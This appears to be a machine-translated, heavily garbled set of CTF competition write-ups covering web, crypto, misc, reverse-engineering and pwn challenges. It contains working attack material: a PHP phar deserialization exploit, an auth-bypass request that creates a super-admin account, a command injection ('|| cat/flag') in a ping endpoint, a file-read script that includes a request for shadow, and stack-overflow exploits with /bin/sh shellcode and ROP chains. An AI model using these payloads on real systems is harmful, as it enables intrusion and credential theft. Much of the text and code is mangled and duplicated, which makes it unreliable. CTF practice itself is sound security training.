0x9e、0x56,0x28,0xb0,0x35,0x1b、0x5f、0xf5,0x05,0xbc、

0x3c、0x4f、0x8c、0xe6,0xf6,0x75,0xf4,0xf8,0xdd、0x11、

0xc1,0xb9,0x4e、0x97,0xd6,0xf2,0xe4,0xd1,0x82,0xd3、

0x03,0x8b、0x4b、0xca、0x64,0xeb、0xab、0x71,0xa1,0xba、

0xa8,0x6a、0x1e、0x1a、0xa5,0x49,0x6e、0x53,0x66,0x39、

0x51,0xe9,0x26,0xc4,0xda、0x55,0x3f、0xea、0x85,0x8a、0x85,0x8a、

0xd9,0x13,0x69,0x1f、0xe2,0x7f、0x2f、0xc5,0x88,0x57、

0x73,0xa3,0xe3,0x0f、0xbb、0x18,0xe5,0x42,0x22,0x52、

0x43,0x80,0x2a、0x6b、0x17,0xd7,0x23,0x06,0x58,0x1d、

0x7a、0x84,0xe7,0xee、0xd0,0x41,0xd4,0xbd、0xa0,0xc3、

0xc2,0xfd、0x21,0x54,0xdf、0x7b、0xb7,0xf0,0xb2,0x77、

0x3d、0x07、0x78、0x16、0x9c、0x59、0xaf、0x2e、0x83、0xfa、

0x9b、0x95,0xf7,0x40,0x94,0xf3,0xcd、0xc7,0x91,0x10、

0xdc、0x4a、0x14、0x9a、0x5c、0x76



invsbox=[sbox.indexiforiinrange256]

Learntfromhttp://cs.ucsb.edu/〜koc/cs178/projects/jt/aes.c

Xtime=lambdaa:a1^0x1b0xffifa0x80elsea1

rcon=

0x00,0x01,0x02,0x04,0x08,0x10,0x20,0x40、

0x80,0x1b、0x36,0x6c、0xd8,0xab、0x4d、0x9a、0x9a、

0x2f、0x5e、0xbc、0x63、0xc6、0x97、0x35、0x6a、

0xd4、0xb3、0x7d、0xfa、0xef、0xc5、0x91、0x39、0x39、



deftext2matrixテキスト:

Matrix=[]

Foriinrange16:

byte=text8*15-i0xff

ifi4==0:

matrix.append[byte]

else:

マトリックス[i //4] .appendbyte

ReturnMatrix

defmatrix2TextMatrix:

テキスト=0

Foriinrange4:

Forjinrange4:

テキスト|=matrix [i] [j]120-8*4*i+j

returnText

classaes:

def__init __self、master_key:

self.change_keymaster_key

defchange_keyself、master_key:

self.round_keys=text2matrixmaster_key

self.round_keys

Foriinrange4,4*11:

self.round_keys.append[]

ifi4==0:

byte=self.round_keys [i-4] [0] \

^sbox [self.round_keys [i-1] [1]] \

^rcon [i //4]

self.round_keys [i] .appendbyte

Forjinrange1,4:

byte=self.round_keys [i-4] [j] \

^sbox [self.round_keys [i-1] [j+14]]

self.round_keys [i] .appendbyte

else:

Forjinrange4:

byte=self.round_keys [i-4] [j] \

^self.round_keys [i-1] [j]

self.round_keys [i] .appendbyte

self.round_keys

defencryptself、plantext:

self.plain_state=text2matrixplantext

self .__ add_round_keyself.plain_state、self.round_keys [:4]

Foriinrange1,10:

self .__ round_encryptself.plain_state、self.round_keys [4*i:4*i+1

self .__ sub_bytesself.plain_state

self .__ shift_rowsself.plain_state

self .__ add_round_keyself.plain_state、self.round_keys [40:]

returnMatrix2Textself.plain_state

defdecryptself、ciphertext:

self.cipher_state=text2matrixciphertext

self .__ add_round_keyself.cipher_state、self.round_keys [40:]

self .__ inv_shift_rowsself.cipher_state

self .__ inv_sub_bytesself.cipher_state

Foriinrange9,0、-1:

self .__ round_decryptself.cipher_state、self.round_keys [4*i:4*i+1

self .__ add_round_keyself.cipher_state、self.round_keys [:4]

returnMatrix2Textself.cipher_state

def__add_round_keyself、s、k:

Foriinrange4:

Forjinrange4:

s [i] [j]^=k [i] [j]

def__round_encryptself、state_matrix、key_matrix:

self .__ sub_bytesstate_matrix

self .__ shift_rowsstate_matrix

self .__ mix_columnsstate_matrix

self .__ add_round_keystate_matrix、key_matrix

def__round_decrypt

HireHackking

朝のCTFパヌト

web

simplelogin

Yakitはパスワヌドを砎裂させたした。A123456であるこずを忘れないでください。

h2amtakmaqa1080.png

pppp

index.phpには任意のファむルがありたす

php

//upload.php

error_reporting0;

highlight_file__ file__;

クラスA {

public $ a;

パブリック関数__Destruct

{

$ s=$ this- $ a;

$ s;

}

}

クラスB {

public $ cmd;

function __invoke{

$ this-startを返したす。

}

function start{

゚コヌシステム$ this-cmd;

}

}

ifisset$ _ get ['file']{

ifstrstr$ _ get ['file']、 'flag'{

die 'get out';

}

echo file_get_contents$ _ get ['file'];

}



upload.php:を読んでください

 - php

error_reporting0;

ifisset$ _ files ['file']{

mkdir 'upload';

$ uid=uniqid;

$ ext=Explode '。'、$ _ files ['file'] ['name'];

$ ext=end$ ext;

move_uploaded_file$ _ files ['file'] ['tmp_name']、 'upload/'.$ uuid。'。png ';

echo'uploadsuccessfilepath:upload/'.$ uuid。 '。png';

} -

アップロヌドされたファむルは.pngに倉曎されたす

PHARファむルをアップロヌドし、ホヌムペヌゞにfile_get_contentsを䜿甚しおDeserialization実行コマンドをトリガヌしおみおください。

//phar.php

php //phar.php

classa {

public $ a;

publicFunction__Destruct

{

$ s=$ this-a;

$ s;

}

}

classb {

public $ cmd;

function__construct{

$ this- $ cmd='catflag';

}

function__invoke{

$ this-startを返したす。

}

functionstart{

System$ this-cmd;

}

}

$ b=newb;

$ b-cmd='cat/flag';

$ a=newa;

$ a-a=$ b;

@unlink 'phar.phar';

$ phar=newpar 'phar.phar'; //接尟蟞はpharでなければなりたせん

$ phar-startbuffering;

$ phar-setstub 'php__halt_compiler;'; //Set Stub

$ phar-setmetadata$ a; //カスタムメタデヌタをマニフェストに保存したす

$ phar-addfromstring 'a.txt'、 'abb'; //ファむルを远加しお圧瞮したす

$ phar-stopbuffering; //眲名は自動的に蚈算されたす



アップロヌドずアクセス

key5ca1cpxq1081.png

Misc

ftp

トラフィック抜出zip、そしおパスワヌドは同じパスワヌドパスワヌド1234567890です。

ksfglhwvhfn1082.png

crypto

baby_words with Buddha

AES、しかしXORの埌、結果は文字に倉換されるので、それを元に戻しおAESを解くこずができたす

rushiwowen=[

'无', 'mu', 'monk', 'room', 'art', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'

'未'、 'li'、 'blin'、 'due'、 'mul'、 '劊嚠'、 'san'、 'black'、 'naked'、 'bean'、 'special'、 'div'、 'reach'、 'regent'、 'length'、 'lengs'、 'length'、 'length'、 'length'、

「曞かれた」、「番号」、「責任」、「尊敬」、「ro」、「rot」、「尊敬」、「尊敬」、「尊敬」、「尊敬」、「3」、「bing」、「bing」、 'no'、 '責任者、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」」 「責任」、「責任」、「責任」、

「掞察」、「思考」、「倢」、「削陀」、「恐ろしい」、「抑制」、「抑制」、「抑制」、「抑制」、「抑制」、「意志」、「知恵」、「叀い」、「」、「」、

'Roar'、 'foot'、 'you'、 'wang'、 'you'、 'won'、 'mu'、 'mu'、 'light'、 'protect'、 'jin'、 'harmony'、 'going'、 'treasure'、 'win'、 'tong'、 'won'、 'win'、 'Tong'、

「薬」、「教垫」、「小さな」、「生きおいる」、「玔粋」、「取匕」、「マりンテン」、「グッド」、「パス」、「go」、「7」、「 'not'、 'come'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 '

'cause'、 'huldine'、 'five'、 '100'、 'ten000'、 'flowers'、 'buillions'、 'decision'、 'six'、 'fang'、 'name'、 'name'、 'tong'、 'yue'、 'yun'、 'dian'、 'miracle'、

'Zun'、 'tree'、 'root'、 'west'、 'soap'、 'flame'、 'north'、 'qing'、 'number'、 'element'、 '改善'、 'head'、 'silence'、 'momation'、 'element'、 'fore'、 'felement'、 'ement'、 'form'、 'fement'、 'felem'、 '' '' '' '、' feneme '、' '' ''、 'fenemen

'do'、 'shi'、 'ga' '' '、' ni '、' le '、' a '、' du '、' zhong '、' yang '、' Zhong '、' Zhong '、' Zhong '、' Zhong、 'Zhong、' Zhong '、' Zhong '、' Zhong ' 「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」 「Zhong」、「Zhong」

「アクション」、「空き」、「空き」、「思いやり」、「心配」、「誰か」、「満足」、「安定」、「䌑息」、「day」、「倜」、「栜培」、

'hold'、 'heart'、 'seeking'、 'ricitation'、 'ricitation'、 'this'、 'sutra'、 '゚ネルギヌ、「死」、「排陀」、「排陀」、「有毒」、「害」、「ハむ」、「ハむ」、「オヌプン」、「テキスト」、「テキスト」、

'super'、 'lift'、 'cool'、 'if'、 '思考'、 'that'、 '' '、' '' '、' emperor '、' vi '、' true '、' ling '、' qian '、' shu '、' ha '、'尊敬'、

「莈り物」、「颚氎」、「先祖」、「ファヌスト」、「芪の敬iety」、「ダブル」、「私のマスタヌ」、「滞圚」、「私のマスタヌ」、「愛」、「兄匟」、「兄匟」、「最初」、「友人」、「友人」、「友人」、「友人」、

「音楜」、「犅」、「䞀族」、「私の」、「私の」、「私の」、「教育」、「倪陜」、「タむム」、「タむダ」、「バルス」、「陰」、「Yin」、「困難」、「経枈」、

'urgent', 'soft', 'soft', 'shoulder', 'creation', 'soft', 'soft', 'shu', 'shu', 'shu', 'shu', 'creation', 'repet', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 '

「キル」、「リリヌス」、「ブリッゞ」、「ロヌド」、「コヌブ」、「小さな」、「ドロヌ」、「ドロヌ」、「ドロヌ」、「ドロヌ」、「スリヌプ」、「スむヌプ」、「スむヌプ」、「スむヌプ」、「スむヌプ」、「スむヌプ」、「ドン」、「投資」、「投資」、

enc='愛を暗唱する人は、メンザバオを守り、心の嘘の嘘の嘘を嘘を぀いお、心の嘘を殺し、心配し、心配し、嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘を暗唱しおいたす嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘シュヌ嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘は

dec=b ''

enc3360のiの堎合

Dec +=rushiwowen.indexi ^ 64.to_bytes1、 'Little'

key=b'dasctf@key@^_^@encode !仏! '

iv=b'iv | dasctf | ovo | iv '

crypto.cipher Import AESから

crypto.util.paddingむンポヌトパッドから、unpad

cryportor=aes.newkey、aes.mode_cbc、iv

padded_data=paddata.encode 'utf-8'、aes.block_size

encrypted_data=cryptor.decryptdec

printencrypted_data

vrsz5zetf131083.png

re

normalandroid

JADXを開くず、1぀の関数のみを呌び出しお、IDAを芋お、過去にそれを芋おください。

qthxjbg2tps1084.png

キヌのようなものを芋お、キヌを倉換できたす。

xul31i40kau1085.png

衚面

owe5c22utg41086.png

衚面

pxwy0zlp3mf1087.png

次に、AES暗号化である暗号化ロゞックを入力し、Sボックスは過去に倉曎されたした。

gvgg1hrxlbz1088.png

したがっお、AESによっお実装されたコヌドを芋぀けおSボックスを倉曎し、倉換されたキヌを䜿甚しお埩号化したす。ネットワヌクの競争が遮断されたため、圓時はスクリプトが保存されおいなかったので、私はそれを䜜りたせんでした

fromcrypto.util.numberimportlong_to_bytes、bytes_to_long

https://github.com/bozhu/aes-python/blob/master/aes.py

sbox=

0xbe、0xb4,0x9f、0x70,0xdb、0xad、0x31,0x30,0x6c、0x87、0x87

0x74,0x27,0xc9,0x4c、0x67,0x62,0x0a、0x36,0x08,0xc8、

0x96,0x32,0x00,0xf1,0x38,0x65,0xec、0xed、0x44,0x25、

0xaa、0x33,0x86,0xef、0x0d、0x19,0x7d、0xd5,0x45,0xfb、

0x8d、0x61,0xfe、0x50,0x47,0x7e、0x7c、0xf9,0x01,0xde、

0xff、0xe1,0xac、0x5d、0xb5,0x8e、0x48,0xbf、0x90,0x9d、

0x79,0xcb、0xa6,0xa9,0xfc、0x34,0xcf、0x63,0x5a、0x99、0x99、

0x98,0xb8,0x92,0x2d、0x02,0x89,0x2c、0x3b、0x15,0x72、0x15,0x72

0x5e、0x60,0x29,0x6f、0x0b、0x24,0x6d、0x1c、0x5b、0xe0、

0x37,0xa4,0xcc、0x12,0x93,0xa7,0x09,0xc6,0xb6,0x8f、

0x04,0x20,0xe8,0x46,0xb1,0xae、0x3a、0x68,0x81,0xce、

0x2b、0x0c、0xb3,0x3e、0xc0,0x0e、0x4d、0xd8,0xd2,0xa2、

0x9e、0x56,0x28,0xb0,0x35,0x1b、0x5f、0xf5,0x05,0xbc、

0x3c、0x4f、0x8c、0xe6,0xf6,0x75,0xf4,0xf8,0xdd、0x11、

0xc1,0xb9,0x4e、0x97,0xd6,0xf2,0xe4,0xd1,0x82,0xd3、

0x03,0x8b、0x4b、0xca、0x64,0xeb、0xab、0x71,0xa1,0xba、

0xa8,0x6a、0x1e、0x1a、0xa5,0x49,0x6e、0x53,0x66,0x39、

0x51,0xe9,0x26,0xc4,0xda、0x55,0x3f、0xea、0x85,0x8a、0x85,0x8a、

0xd9,0x13,0x69,0x1f、0xe2,0x7f、0x2f、0xc5,0x88,0x57、

0x73,0xa3,0xe3,0x0f、0xbb、0x18,0xe5,0x42,0x22,0x52、

0x43,0x80,0x2a、0x6b、0x17,0xd7,0x23,0x06,0x58,0x1d、

0x7a、0x84,0xe7,0xee、0xd0,0x41,0xd4,0xbd、0xa0,0xc3、

0xc2,0xfd、0x21,0x54,0xdf、0x7b、0xb7,0xf0,0xb2,0x77、

0x3d、0x07、0x78、0x16、0x9c、0x59、0xaf、0x2e、0x83、0xfa、

0x9b、0x95,0xf7,0x40,0x94,0xf3,0xcd、0xc7,0x91,0x10、

0xdc、0x4a、0x14、0x9a、0x5c、0x76



invsbox=[sbox.indexiforiinrange256]

Learntfromhttp://cs.ucsb.edu/〜koc/cs178/projects/jt/aes.c

Xtime=lambdaa:a1^0x1b0xffifa0x80elsea1

rcon=

0x00,0x01,0x02,0x04,0x08,0x10,0x20,0x40、

0x80,0x1b、0x36,0x6c、0xd8,0xab、0x4d、0x9a、0x9a、

0x2f、0x5e、0xbc、0x63、0xc6、0x97、0x35、0x6a、

0xd4、0xb3、0x7d、0xfa、0xef、0xc5、0x91、0x39、0x39、



deftext2matrixテキスト:

Matrix=[]

Foriinrange16:

byte=text8*15-i0xff

ifi4==0:

matrix.append[byte]

else:

マトリックス[i //4] .appendbyte

ReturnMatrix

defmatrix2TextMatrix:

テキスト=0

Foriinrange4:

Forjinrange4:

テキスト|=matrix [i] [j]120-8*4*i+j

returnText

classaes:

def__init __self、master_key:

self.change_keymaster_key

defchange_keyself、master_key:

self.round_keys=text2matrixmaster_key

self.round_keys

Foriinrange4,4*11:

self.round_keys.append[]

ifi4==0:

byte=self.round_keys [i-4] [0] \

^sbox [self.round_keys [i-1] [1]] \

^rcon [i //4]

self.round_keys [i] .appendbyte

Forjinrange1,4:

byte=self.round_keys [i-4] [j] \

^sbox [self.round_keys [i-1] [j+14]]

self.round_keys [i] .appendbyte

else:

Forjinrange4:

byte=self.round_keys [i-4] [j] \

^self.round_keys [i-1] [j]

self.round_keys [i] .appendbyte

self.round_keys

defencryptself、plantext:

self.plain_state=text2matrixplantext

self .__ add_round_keyself.plain_state、self.round_keys [:4]

Foriinrange1,10:

self .__ round_encryptself.plain_state、self.round_keys [4*i:4*i+1

self .__ sub_bytesself.plain_state

self .__ shift_rowsself.plain_state

self .__ add_round_keyself.plain_state、self.round_keys [40:]

returnMatrix2Textself.plain_state

defdecryptself、ciphertext:

self.cipher_state=text2matrixciphertext

self .__ add_round_keyself.cipher_state、self.round_keys [40:]

self .__ inv_shift_rowsself.cipher_state

self .__ inv_sub_bytesself.cipher_state

Foriinrange9,0、-1:

self .__ round_decryptself.cipher_state、self.round_keys [4*i:4*i+1

self .__ add_round_keyself.cipher_state、self.round_keys [:4]

returnMatrix2Textself.cipher_state

def__add_round_keyself、s、k:

Foriinrange4:

Forjinrange4:

s [i] [j]^=k [i] [j]

def__round_encryptself、state_matrix、key_matrix:

self .__ sub_bytesstate_matrix

self .__ shift_rowsstate_matrix

self .__ mix_columnsstate_matrix

self .__ add_round_keystate_matrix、key_matrix

def__round_decrypt

HireHackking

予備競争

web_ezcms

スワッガヌリヌクテスト/テストテストアカりントログむン、/sys/user/**認蚌を実行しおいたせん。スヌパヌ管理者ナヌザヌを远加できたす。

1049983-20240802141202586-170871422.jpg

珟時点では、roleIDはただ䞍明です。ロヌルモゞュヌルは䞍正ではありたせん。ナヌザヌモゞュヌルを読み続け、むンタヌフェむスを発芋したす

1049983-20240802141203506-2056064072.jpg

ここにはロヌルIDリヌクがありたす。ここでは、以前にリヌクされた管理者のIDFCF34B56-A7A2-4719-9236-867495E74C31に蚘入しおください

取埗/sys/user/roles/fcf34b56-a7a2-4719-9236-867495e74c31この時点で、スヌパヌ管理者IDは11b3b80c-4a0b-4a92-96ea-fdd4f7a4a4a7e9

{

'createwhere ':0、

'Deptid':'1'、

'email ':' '、

'password ':'123456'、

'Phone':'1111111111'、

'roleids': [

'11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9'

]、

'sex':'fmale'、

'username ':'hacker'

}パスワヌドフィヌルドデコヌドに倱敗し、テストアカりントでログを確認しお、AESのキヌであるAbcdefghijklmnopを芋぀け、ナヌザヌが正垞に远加されたした。ナヌザヌを远加した埌、モゞュヌルでping関数を芋぀けたしたが、WAFがありたす。 WAFをバむパスし、コマンドを実行しおフラグを取埗したす

post/sys/pinghttp/1.1

host:

user-agent:mozilla/5.0macintosh; intelmacosx10.15; rv3360126.0gecko/20100101firefox/126.0

Accept:Application/json、text/javascript、*/*; q=0.01

Accept-Language:Zh-Cn、Zh; q=0.8、Zh-tw; q=0.7、zh-hk; q=0.5、en-us; q=0.3、en; q=0.2

Accept-Encoding:GZIP、deflate

content-type:Application/json; charset=utf-8

authorization:eyjhbgcioiijiuzi1nij9.eyjzdwiioiijmy2yzngi1ni1hni1hni1hni2eyltq3mtktotizni04njc0otvlnzrjmzeilcjqd3qtcm9szxmta2 v5xyi6wylotoxnuqfnrqhnkiblkzgixswiaxnzijoiewluz3h1zs5jb20ilcjqd3qtcgvybwlzc2lvnmta2v55ijpbinnn5czp1c2vyomxpc3qilcjzexm 6ZgVWDDP1CGRHDGUILCJZEXM6ZGVWDDPKZXRHAWWILCJZEXM6DXNLCJPYB2XLONVWZGF0ZSISINNN5CZPWZXJTAXNZAW9UOMFKZZCISINNN5CZPWZXJTAXNZAW9UOMFKZCISINN5CZP1C2BYOMFKZCISCISCISINNN5CZP1C2BYOMFKZCISCISCISINN5 p1c2vyomfkzcisinn5czp1c2vyomrlbgv0zwqilcjzexm6cgvybwlzc2lvbjp1cgrhdguilcjzzexm6dxnlcjpkzxrhawwilcjzexm6zgiwiciwiciwic3lciwiciwiciwic3lciwikiwic3lckzwdgkdgkdgkdgkdgkdgkzdgkdgkzdgkzdgkdgkzdgkkzdgkdgkzdgkdgkkzdgkdgkdgkdgkkzdgkkdgkdgkknedgiwic3l jvbgu6dxbkyxrliiwic3lzonjvbgu6zgv0ywlsiiwic3lzomrlchq6bglzdcisinnn5czpkzxb0mfkzcisinn5czp1c2vyonvwzgf0zsisinnn5czp2xl2xl2xl2xLisb2xLie 6cm9sztpkzwxldgvkiiwic3lzonblcm1pc3npb246bglzdcisinn5czpwzjtaxnzaw9uomrldgfpbcisinn5czpwzxjtaxnzaw9uomrldgfpbcisinn5czinn5czinn5czinn5czinn5czinn5czinn5czn5czinn5czinn5czinn5czinn5czinn5czinn5czinn5czinn5czinn5czinn5czn5czn5 mrlbgv0zwqilcjzexm6bg9nomrlbgv0zwqilcjzexm6dxnlcjpyb2xlomrldgfpbcisinnn5czinnn5czinnn5czinnn5czinnn5czinnn5cisinnn5czpsb2c6bglzdcjdlcjqd3qddx nlci1uyw1llwtlesi6imfkbwluiiwizxhwijoxnze2nze3mjiwlcjpyxqioje3mty3mty3mty3mty3mty3mty0lftbd2b7yaampkktl_eo0kjcb5j3bw8fka

X-Requested With:xmlhttprequest

Content-Length:28

Origin:

DNT:1

SEC-GPC:1

connection:close

参照:

cookie:jsessionid=c701d746da63e8fb94270ad6d2fd9adb

sec-fetch-dest:Empty

sec-fetch-mode:cors

SEC-FETCH-SITE:SAME-ORIGIN

Priority:U=1

{'ip':'10.10.10.10-1 || cat/flag'}

トップシヌクレットファむルコヌドP

importcv2

importnumpyasnp

S=1790932091819291499534661361785420675976823277412565868079070707029728290913658

fromcrypto.util.numberimport*

P、Q=24162760378372762422470687817893681267、

34743245425789325049640796550677777649463

## assertp ** 2+q ** 2==s

## printisprimep、isprimeq

img_path='flag_enc.png'

IMG=cv2.imreadimg_path

#printimg.shape

fromympy.solvers.diophantine.diophantineimportcornacchia

'' '

この堎所は、sから倉曎し、分解し、Factordbだけを倉曎する必芁がありたす

f={724721568156194459002808961358148476581:1,157606014 2432444438240601:1,5801674693:1,2:1,1351:1}}

'' '

x1=cornacchia1,1、s

Fora、binx1:

Asserta ** 2+B ** 2==s

ifisprimeaandisprimeb:

印刷a、b

ここでPずQを取埗したした

fromcrypto.util.numberimport*

P、Q=302951519841786100871482507429649247,2954888723650623654106370451762393175957

S=1790932091819291499534661361785420675976823277412565868079070707029728290913658

assertisprimepandisprimeqandp ** 2+q ** 2==s

importcv2

path1='flag_enc.png'

img=cv2.imreadpath1

#printimg.shape

r、c、d=img.shape

印刷r、c

i、j=101,201

fromtqdmimporttqdm

A、B=P、Q

foriintqdmranger:

Forjinrangec:

set1=set

set1.addi、j

i1、j1=i、j

WHILETRUE:

x=i1+b*j1r

y=a*i1+a*b+1*j1c

i1、j1=x、y

ifx、ynotinset1:

set1.addx、y

else:

ifi==0andj==0:

続行したす

assertlenset1==190はすべおデフォルト190です

ここは190であるこずがわかりたした。埌で觊れ始めたのは偶然でした。

s1=s190

#prints1

#importnumpyasnp

#defarnoldimg、shuffle_times、a、b:

r、c、d=img.shape

p=np.zerosimg.shape、np.uint8

#printr、c、d、shuffle_times

#forsinrangeshuffle_times:

#foriinranger:

#forjinrangec:

x=i+b*jr

#y=a*i+a*b+1*jc

#P [x、y、]=img [i、j、]

img=np.copyp

#returnp

x1=アヌノルドimg、11、p、q

cv2.imwrite 'flag3.png'、x1

## cv2.imwrite 'flag1.png'、img



C=17909320918192914995346613617854206759768232774125658680790707029728290913658

P、Q=302951519841786100871482507429649247,2954888723650623654106370451762393175957

importcv2

importnumpyasnp

DefarnoldIMG、shuffle_times、a、b:

r、c、d=img.shape

p=np.zerosimg.shape、np.uint8

印刷r、c、d、shuffle_times

forsinrangeshuffle_times:

foriinranger:

Forjinrangec:

x=i+b*jr

y=a*i+a*b+1*jc

p [x、y、]=img [i、j、]

img=np.copyp

戻る

img=cv2.imread 'flag_enc.png'

#printimg

C1=C190

Foriinrange190:

img=arnoldimg、1、p、q

cv2.imwritef'flag {i+1} .png '、img

'' '

1。激しく列挙しおください。ずにかく、サむクルは190です。すべおを列挙しおください。 i=66を芋぀けるず、flag67.pngはflagです

2.FLAG {ailuropoda_rnelaNoleuca}

''

正しいこずをし続ける

トラフィックパケットから取埗されたデヌタは、画像の16進システムです

1049983-20240802141204115-667496384.jpg

圌の16進システムを確認し、圌の終わりに远加のデヌタがあるこずを芋぀けたす

1049983-20240802141204919-1421521109.jpg

それはVIM描画コマンドで、drawitを盎接むンストヌルし、コマンドを入力しおマップを描画したす

ゲヌム

ゲヌムを盎接プレむしおフラグを取埗したす

これは本圓のサむンむン

です

1049983-20240802141205695-1581426213.jpg

funiot

Dockerファむルのセットを提䟛し、バむナリファむルを実行し、逆を盎接開き、次にダむナミックデバッグず静的分析を組み合わせおプロトコル圢匏を分析し、最終的に読み取りファむルの関数の1぀を䜿甚し、//ByPass比范怜出を䜿甚したす。

1049983-20240802141206375-612647167.jpg

次に、フラグを読みたす

frommpwnimport*

Importzlib

p=remote '127.0.0.1'、6768

p=remote '173.34.20.10'、6768

ヘッダヌ=b'funiot '6

CMD=0x102

cmd_encode=intcmd.to_bytes2、 'big'

len=0x0101

length=intlen.to_bytes2、 'big'

content=b'getinfo:shadow '

content=b'getinfo:/lib/udev/rc_keymaps/asus_pc39.toml '

content=b'getinfo: //flag '

content=content.ljust0x101、b '\ x00'

check_sum=intzlib.crc32content。to_bytes4、 'big'

full_content=header+length+cmd_encode+check_sum+content

packet:

header:6Bytes

length:2bytes

CMD:2BYTES

CheckSum:4Bytes

CONTENT:UNKNOW

context.log_level='debug'

p.sendfull_content

p.Interactive

ImportBase64

printbase64.b64decodep.recv。デコヌド 'utf-8'

command:getinfo、setinfo、secret

yesure_hack

質問には、最倧倀ず最小倀を入力し、この範囲の乱数を掚枬する必芁がありたす。正しく掚枬するず、スタックオヌバヌフロヌを入力したす。オヌバヌフロヌ文字の数は間違っおいるず掚枬した回数であるため、2぀の隣接する数倀を入力しお、十分な回数を掚枬しおから、定期的なスタックオヌバヌフロヌ䜿甚率を実行できたす。スタックを開いた埌に実行できるため、怜出でペむロヌドが空になっおいないこずが必芁なため、シェルコヌドを盎接曞き、XORバむパスされおいない非空癜怜出を実行したした。

ランダムMax-Min+1+Min

frommpwnimport*

context.log_level='debug'

p=process './main'

p=remote '173.34.20.233'、9999

P.Sendlinefterb'ch: '、b'1'

P.Sendlinefterb'enteraminimumandmaximummumberfortheguessinggame: '、b'12'

Foriinrange99:

P.Sendlinefterb'guessanumber '、b'1'

P.Sendlinefterb'guessanumberbetween '、b'2'

ペむロヌド=b'a '*0x3c

ペむロヌド+=P320x0805DEA9

ペむロヌド+=asm '' 'push0xffffffff4

ポピアックス

push0xffffffffffff

popepx

Xoreax、EBX

push0xff978cd0

Popecx

Xorecx、EBX

pushecx

push0x6e69622f

movebx、esp

Xorecx、ECX

int0x80 '' '

ペむロヌド=payload.ljust99、b'a '

䞀時停止

P.Sendlineferterb'congratulation '、ペむロヌド

p.Interactive

msg

蟞曞の蟞曞のスタックオヌバヌフロヌ +フォヌマット文字列の脆匱性。これにより、文字列の脆匱性がカナリアずLIBCに挏れおいたす。

frommpwnimport*

p=process './main'

p=remote '173.34.20.68'、9999

P.Sendlinefterb'message: '、b'11 $ p '

canary=intp.recv18、16

成功f'canary: {hexcanary} '

P.Sendlinefterb'message: '、b'3 $ p '

libc=intp.recv14、16-0x10e1f2

成功f'libc: {hexlibc} '

One=libc+0xe3b01

P.Sendlinefterb'message: '、b'a'*0x28+p64canary+b'b '*8+p64one

䞀時停止

P.Sendlinefterb'message: '、b' \ x00 '*0x10

p.Interactive

スタックオヌバヌ

も叀兞的なスタックオヌバヌフロヌですが、リモヌトLIBCはロヌカルずは少し異なりたす。さらに、返品アドレスは、Leaf ESP [ECX-4]、RETを介しお返されたす。これは正垞に䜿甚されおいたせん。ただし、プログラムをさたざたな出力堎所に制埡した埌、スタック環境は基本的に同じであるず刀断されおいるため、最終的には、LIBCに頌っお利甚しないようにしおください。

frommpwnimport*

context.log_level='debug'

p=process './stackover'

p=remoteb'173.34.20.46 '、9999

p.sendafterb'read: '、b'a'*0x29b

P.Recvuntilb'a '*0x29b

canary=u32b '\ x00'+p.recv3

成功f'canary: {hexcanary} '

䞀時停止

p.sendafterb'read: '、b'a'*0x29b+7+8+0x2c-0x30-4

P.Recvuntilb'a '*0x29b+7+8+0x2c-0x30-4

P.Recv4

P.Recv4

stack=u32p.recv4

成功f'stack: {hexstack} '

䞀時停止

p.sendafterb'read: '、b'b'*0x29b+0x18+7

P.Recvuntilb'b '*0x29b+0x18+7

libc=u32p.recv4-0x1aed5

成功f'libc: {hexlibc} '

䞀時停止

p.sendafterb'read: '、b'a'*0x29b+7+8+0x2c+0x54

P.Recvuntilb'a '*0x29b+7+8+0x2c+0x54

elf_base=u32p.recv4-0x3fb8

成功f'elf_base: {hexelf_base} '

ペむロヌド=b'c '*0x29a-0x14-8

execve0xc9510

System0x41780

puts0x6dc40

ペむロヌド+=P32libc+0x6dc40

ペむロヌド+=P32elf_base+0x1130

ペむロヌド+=b '/bin/sh \ x00'

ペむロヌド+=P32elf_base+0x128e

ペむロヌド+=p32elf_base+0x3fcc

ペむロヌド+=p320

ペむロヌド+=P32stack-0x50

ペむロヌド+=p320

ペむロヌド+=P32libc+0x18e363

ペむロヌド+=P32libc+0x18e363

ペむロヌド+=p320

ペむロヌド+=p320

ペむロヌド+=P32カナリア

ペむロヌド+=p320*3

